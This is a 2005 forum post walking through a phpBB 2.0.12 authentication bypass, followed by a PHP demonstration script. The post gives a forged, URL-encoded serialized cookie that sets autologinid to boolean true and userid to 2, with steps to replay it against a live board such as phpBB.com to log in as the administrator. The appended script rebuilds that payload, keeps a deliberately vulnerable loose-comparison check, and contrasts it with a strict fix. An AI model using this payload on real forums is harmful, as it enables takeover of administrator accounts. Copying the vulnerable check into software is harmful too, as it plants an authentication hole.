General Security Information / phpBB Bug (Again...)
« on: March 25, 2005, 06:30:54 pm »
Ok, now let's get to it. Here is what you will need:
-Preferably a mozilla client, such as Firefox
-LiveHTTP Headers plugin for FireFox Here
Ok, the way this exploit works is that phpBB's session file uses a == instead of a === on the autologinid return, allowing you to use a true boolean. I don't know if this was a typo, but to me I think it was a pretty stupid fuck up by phpBB and I am surprised it wasn't found earlier.
Howto:
Go to a forum, for example phpBB.com, open the forum index, then go into Tools > Live HTTP Headers and click reload. Once the page is reloaded, go into the Live HTTP Headers window and scroll all the way to the top where the first packet is. Then click replay. ScreenShot
In the packet will be the following data:
Code:
Host: www.phpbb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: phpbb2support_data=a%3A0%3A%7B%7D
On this line:
Cookie: phpbb2support_data=a%3A0%3A%7B%7D
Replace the a%3A0%3A%7B%7D with
Code:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
and then click "reload".
After the page has reloaded you should be logged in as user number 2, which is usually the administrator's id number.
I myself have tried it several times; I have not succeeded in getting admin status, so blah.
Edit: phpBB 2.0.12 exploit (that may be why).
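The == versus === point in the post, as an added PHP example that is not from the post and not phpBB's own code: it percent-decodes and unserializes the two cookie values quoted above (the original a%3A0%3A%7B%7D is serialize() of an empty array; the replacement is serialize() of array('autologinid' => true, 'userid' => '2')), runs them through a simplified loose-comparison check in the shape the post describes and a strict one, and rebuilds the forged cookie from scratch. The stored key value, the function names and the exact check structure are assumptions for illustration.

```php
<?php
// Added illustration, not phpBB's code: why a serialized bool(true) in the
// *_data cookie passes a loose (==) autologin comparison, and what === does.

// Hypothetical stand-in for the per-user stored hash the cookie value is
// compared against. Constructed value, not taken from any real board.
$stored_key = md5('hunter2');

// The two cookie values from the post above, exactly as they appear there.
$benign_cookie = 'a%3A0%3A%7B%7D';
$evil_cookie   = 'a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D';

// Decode the cookie the way phpBB 2 did: percent-decode, then unserialize().
// allowed_classes => false keeps unserialize() from instantiating objects.
function read_session_cookie(string $raw): array
{
    $data = @unserialize(urldecode($raw), ['allowed_classes' => false]);
    return is_array($data) ? $data : [];
}

// Vulnerable shape: loose comparison. When autologinid is bool(true), PHP
// compares bool to string by converting the string to bool; any non-empty
// string is true, so the check passes without knowing the key at all.
function autologin_vulnerable(array $sess, string $stored_key): bool
{
    return isset($sess['autologinid'])
        && (string) $sess['autologinid'] != ''   // "1" for bool(true), so this passes too
        && $sess['autologinid'] == $stored_key;  // true == "<hash>" is true
}

// Hardened shape: insist on a string, then compare strictly. is_string()
// rejects bool/int/array values outright; hash_equals() is a constant-time
// === on two strings (PHP >= 5.6).
function autologin_fixed(array $sess, string $stored_key): bool
{
    return isset($sess['autologinid'])
        && is_string($sess['autologinid'])
        && hash_equals($stored_key, $sess['autologinid']);
}

// Rebuild the forged cookie from a PHP array so the payload is not magic:
// serialize() gives a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";}
// and rawurlencode() turns it into what goes on the Cookie: line.
function forge_cookie(string $user_id): string
{
    return rawurlencode(serialize(['autologinid' => true, 'userid' => $user_id]));
}

foreach (['benign' => $benign_cookie, 'forged' => $evil_cookie] as $label => $cookie) {
    $sess = read_session_cookie($cookie);
    printf("%-6s userid=%-2s loose(==)=%-5s strict(===)=%s\n",
        $label,
        $sess['userid'] ?? '-',
        var_export(autologin_vulnerable($sess, $stored_key), true),
        var_export(autologin_fixed($sess, $stored_key), true));
}

// Confirm the post's payload is exactly serialize()+rawurlencode() of that array.
var_dump(forge_cookie('2') === $evil_cookie);
```

Run it with the PHP CLI: the loose check accepts the forged cookie without ever seeing the stored hash, while the strict check rejects it because the value is a boolean rather than a string. The takeaway for any PHP code that unserializes client data is that the attacker controls the type, not just the value, so comparisons against secrets must be type-strict (=== or hash_equals) and the input type must be checked first.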